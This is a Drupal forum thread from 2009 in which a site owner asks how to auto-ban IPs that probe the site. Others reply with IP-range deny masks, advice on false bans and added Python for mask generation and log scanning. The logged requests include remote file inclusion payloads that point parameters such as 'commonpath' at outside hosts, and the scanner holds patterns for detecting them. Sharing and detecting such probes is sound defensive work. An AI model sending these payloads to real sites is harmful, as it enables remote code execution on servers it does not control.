How to automatically ban IP if...

hedac - February 15, 2009 - 11:15

I have a lot of requests from different IPs in China asking for random files with the rar extension.
In the log I see page-not-found errors for mirserver.rar, www.rar, backup.rar,... and so on... I don't have rars on my site, but I would like to automatically ban those IPs trying to get rars from my site, which are consuming my resources.. Is there a way to do this? Thanks

new entry page not found:

hedac - February 15, 2009 - 13:08

new entry page not found: admin/Databackup/NewCloud_Backup.MDB
what is that? lol
it is clear I have tons of spy bots

bots are using many many

hedac - February 20, 2009 - 19:42

bots are using many many different IPs from Korea, China... USA... ..... and they try to exploit some things..... Drupal is secure and doesn't give them anything but a page not found... but... I hate having them around... they eat bandwidth and memory....

new entries:

playlist.php/db.php?commonpath=http://6l0zt.com/technote7/data/group/id.txt??

common/db.php?commonpath=http://www.sec-ir.com/administrator/components/com_joomla-visites/core/modules/remember.txt????

new requests... searching for

hedac - February 23, 2009 - 20:11

new requests... searching for vulnerabilities I guess...

/content/errors.php?error=http://mixcom.ru/pic/main.jpg???

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/bocah_ajaib20/id.txt%0D??

they are all different IPs
not only one bot... hundreds of them... or one bot using a lot of proxies

how could we ban ip for some

hedac - February 23, 2009 - 20:14

how could we ban ip for some days automatically if it requests a page like errors.php... ?

keep having attacks..... this

hedac - February 25, 2009 - 12:28

keep having attacks.....
this is my current list of banned hosts


this one is very rare from

hedac - March 1, 2009 - 23:29

this one is very rare
from Hostname 208.99.199.20

misc/);G(7.V.18==
misc/)))1e(-d.2e,-d.2c);G(42
misc/,M),D.2a(a,
misc/,c);G(40)d.9Q(f,

and more like that...

of course... another ip to the block Deny list.

question and info

deanaugsburger - March 12, 2009 - 02:24

Is there a character that would ban a range of IP addresses in the mask box [access rules] or somewhere else?
I would like to ban/deny the following range: 208.99.192.0 - 208.99.223.255

fwiw; for what it's worth dept;
http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults
http://news.cnet.com/Alleged-Seattle-Spammer-arrested/2100-7348_3-618775...

I don't think so. % is all.

hedac - March 14, 2009 - 21:44

I don't think so. % is all. but not between 192 and 223.

Banning IP range

WiredEscape - July 7, 2009 - 19:01

I get this same spammer hammering away at my site...

You can block the IP range 208.99.192.0 - 208.99.223.255 in Home › Administer › User management › Access rules with:

Deny:
208.99.19_.%
208.99.220.%
208.99.221.%
208.99.222.%
208.99.223.%

Allow:
208.99.190.%
208.99.191.%
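The post above covers the range with one `_` mask plus two compensating Allow rules. As an added example (Python, written here, not from any poster or from Drupal), the function below computes a set of deny masks that covers an a.b.X.0 - a.b.Y.255 range exactly, so no Allow rules are needed, and verifies the result; it assumes the masks use SQL LIKE semantics (`%` any run of characters, `_` exactly one character), which is how the post's masks behave.

```python
import re
from ipaddress import IPv4Address
from typing import List

def like_match(pattern: str, ip: str) -> bool:
    """Match an access-rule mask the way SQL LIKE does: % = any run, _ = one character."""
    regex = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, ip) is not None

def octet_patterns(lo: int, hi: int) -> List[str]:
    """Cover lo..hi with a 'D_' decade mask wherever all ten values are in range, else literals."""
    out, v = [], lo
    while v <= hi:
        if v % 10 == 0 and v + 9 <= hi:
            out.append(f"{v // 10 if v >= 10 else ''}_")   # e.g. 20_ = 200..209, _ = 0..9
            v += 10
        else:
            out.append(str(v))
            v += 1
    return out

def deny_patterns(first: str, last: str) -> List[str]:
    """Deny masks for a range spanning whole third-octet blocks (a.b.X.0 - a.b.Y.255)."""
    a, b, x, x4 = map(int, first.split("."))
    a2, b2, y, y4 = map(int, last.split("."))
    if (a, b) != (a2, b2) or x4 != 0 or y4 != 255 or IPv4Address(first) > IPv4Address(last):
        raise ValueError("range must be a.b.X.0 - a.b.Y.255 within one /16")
    return [f"{a}.{b}.{p}.%" for p in octet_patterns(x, y)]

def covers_exactly(patterns: List[str], first: str, last: str) -> bool:
    """True if every address in the range matches a mask and the neighbours just outside do not."""
    lo, hi = int(IPv4Address(first)), int(IPv4Address(last))
    inside = all(any(like_match(p, str(IPv4Address(n))) for p in patterns) for n in range(lo, hi + 1))
    outside = [str(IPv4Address(lo - 1)), str(IPv4Address(hi + 1))]
    return inside and not any(like_match(p, ip) for p in patterns for ip in outside)

if __name__ == "__main__":
    masks = deny_patterns("208.99.192.0", "208.99.223.255")   # 14 masks, no over-match
    print("\n".join(masks))
    print("exact:", covers_exactly(masks, "208.99.192.0", "208.99.223.255"))
```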

I would like to ask if is

hedac - March 1, 2009 - 23:35

I would like to ask if there is a way to automatically BAN or add the IP to the Deny hosts list if they try to reach a specific page, for example "content/common/db.php"

This one is tricky. On what

frames - March 2, 2009 - 03:10

This one is tricky. On what to consider "bannable" and if it is really worth it, in terms of processing time needed to identify these attacks and in terms of possible "false bans" (a www site is supposed to be a public place).

I can't mention a Drupal project for this.

At the webserver level, protecting against IPs used to "scan" a site sounds good. I can think of looking for IPs being present many times in /var/logs. There is a risk of banning a legitimate spider, such as Google.

Similarly, you could look for a certain "phrase" in that file, no matter if it's repeated or not. This is what you asked for (the phrase would be the path you would want).

For starters, take a look at Banning Bad Bots: A Short But Effective Script (not a Drupal specific solution).

Hope that helps. Regards!
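As an added example of the log-scanning approach frames describes (Python, written here, not from any poster or from Drupal): it scans constructed access-log lines for the probe paths quoted in the thread, counts them per IP, and keeps an allowlist and a hit threshold to reduce the false-ban risk. The log format, sample lines and IP addresses are all constructed.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, Set

# Apache/nginx "combined" access-log format; the sample lines below are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Probe signatures based on the paths quoted in the thread: archive files the site
# never hosted, and query parameters whose value is a remote URL.
PROBE_RES = [re.compile(r'\.rar(\?|$)', re.I), re.compile(r'\?[^=]+=https?://', re.I)]

def is_probe(path: str, status: str) -> bool:
    """Count a hit only if it matched a signature AND the server returned 404,
    so a real page that legitimately takes a URL parameter is not flagged."""
    return status == "404" and any(r.search(path) for r in PROBE_RES)

def find_probing_ips(lines: Iterable[str], threshold: int = 2,
                     allowlist: Set[str] = frozenset()) -> Dict[str, int]:
    """Return {ip: probe_count} for IPs with at least `threshold` probes.
    `allowlist` holds addresses you never want to ban (own monitors, known crawlers)."""
    counts: Dict[str, int] = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("ip") in allowlist:
            continue  # malformed line or explicitly trusted source
        if is_probe(m.group("path"), m.group("status")):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample: documentation-range IPs (RFC 5737), not real hosts.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Feb/2009:20:11:01 +0000] "GET /content/errors.php?error=http://example.invalid/main.jpg HTTP/1.1" 404 512',
    '203.0.113.7 - - [23/Feb/2009:20:11:03 +0000] "GET /common/db.php?commonpath=http://example.invalid/id.txt HTTP/1.1" 404 512',
    '198.51.100.9 - - [15/Feb/2009:11:10:00 +0000] "GET /backup.rar HTTP/1.1" 404 512',
    '198.51.100.9 - - [15/Feb/2009:11:10:01 +0000] "GET /www.rar HTTP/1.1" 404 512',
    '198.51.100.9 - - [15/Feb/2009:11:10:02 +0000] "GET /mirserver.rar HTTP/1.1" 404 512',
    '192.0.2.5 - - [15/Feb/2009:11:15:00 +0000] "GET /node/12?redirect=http://example.invalid/ HTTP/1.1" 200 8192',
    '192.0.2.5 - - [15/Feb/2009:11:15:09 +0000] "GET /files/notes.rar HTTP/1.1" 404 512',
]

if __name__ == "__main__":
    for ip, n in sorted(find_probing_ips(SAMPLE_LOG).items()):
        print(f"{ip}: {n} probe(s)")  # 198.51.100.9: 3, 203.0.113.7: 2
```

The single-hit 192.0.2.5 stays below the default threshold, and a 200 response to a URL-valued parameter is never counted, which is the kind of guard against "false bans" the post above asks for.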

then there's always...

silverwing - March 2, 2009 - 03:15

http://drupal.org/project/badbehavior - not quite what the OP is asking about, but should help a bit.

~silverwing

_____________________________________________
MisguidedThoughts

thanks. very interesting...

hedac - March 2, 2009 - 10:16

thanks. very interesting... maybe it is what I'm looking for.

Thanks :) I have searched

hedac - March 2, 2009 - 10:19

Thanks :)
I have searched info for the IPs and none of them are Google or any good bot. All of them are in some unknown host providers or without info. And also, Google bot should not request pages with all those suspicious parameters.
I think that rewrite solution is very good

You're welcome

frames - March 2, 2009 - 19:00

Just a further comment: When I said "There is a risk of banning a legitimate spider, such as Google.", I should have said "there is a risk of banning a legitimate IP, such as Google's or any other IP."

With public non-fixed IPs being used by these suckers, and if you use an automatic solution, you might be banning ANYONE on the Internet from seeing your site.

The impact of this can be negligible (20-100 users out of millions?), but that IP can be used by anyone on the net. It's just a balance between living with those extra requests handled by the server (and keeping everything patched, which is a must) or losing (even though it's just a bit) of your visibility. You and I can afford losing those potential readers. The New York Times or a high-traffic site might not.

A different but related issue would be a DoS attack. Those are punctual in time, but another PITA!
